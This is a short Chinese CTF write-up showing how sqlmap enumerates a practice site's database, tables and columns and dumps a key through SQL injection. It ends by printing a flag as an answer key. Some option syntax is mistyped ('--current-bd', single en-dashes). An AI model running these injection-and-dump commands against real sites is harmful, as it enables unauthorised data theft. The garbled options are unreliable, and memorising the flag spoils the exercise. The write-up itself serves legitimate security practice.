Sqlmap的使用(1)

Sqlmap的使用(1)

本次实验使用kali Linux里自带的sqlmap,以网址“ctf5.shiyanbar.com/8/index.php?id=1”为例,进行sql注入扫描获取key值。

打开kali2.0的终端界面,输入sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

Sqlmap的使用(1)_第1张图片

Sqlmap的使用(1)_第2张图片

所以我们得知,数据库名可能为my_db。接下来可以猜解表名。

输入sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db –tables

Sqlmap的使用(1)_第3张图片

Sqlmap的使用(1)_第4张图片

得到两个表名,分别是news和thiskey。所以key值很有可能藏在thiskey表里面。继续猜解列名。

输入sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns

Sqlmap的使用(1)_第5张图片

Sqlmap的使用(1)_第6张图片

列名为k0y而且是一个txt文本类型,继续猜解文本内容。

输入sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -Ck0y –dump

Sqlmap的使用(1)_第7张图片

Sqlmap的使用(1)_第8张图片

成功拿到key值。

 

总结:在打—current-bd的时候要注意,current和bd之间的-号是连在一起的,如果分开会出错。这道题的原链接挂了,提交答案一直是错的,所以不要在意细节。


类似的题:http://ctf5.shiyanbar.com/web/index_3.php

正确答案:flag{Y0u_@r3_5O_dAmn_90Od}

你可能感兴趣的:(sql注入)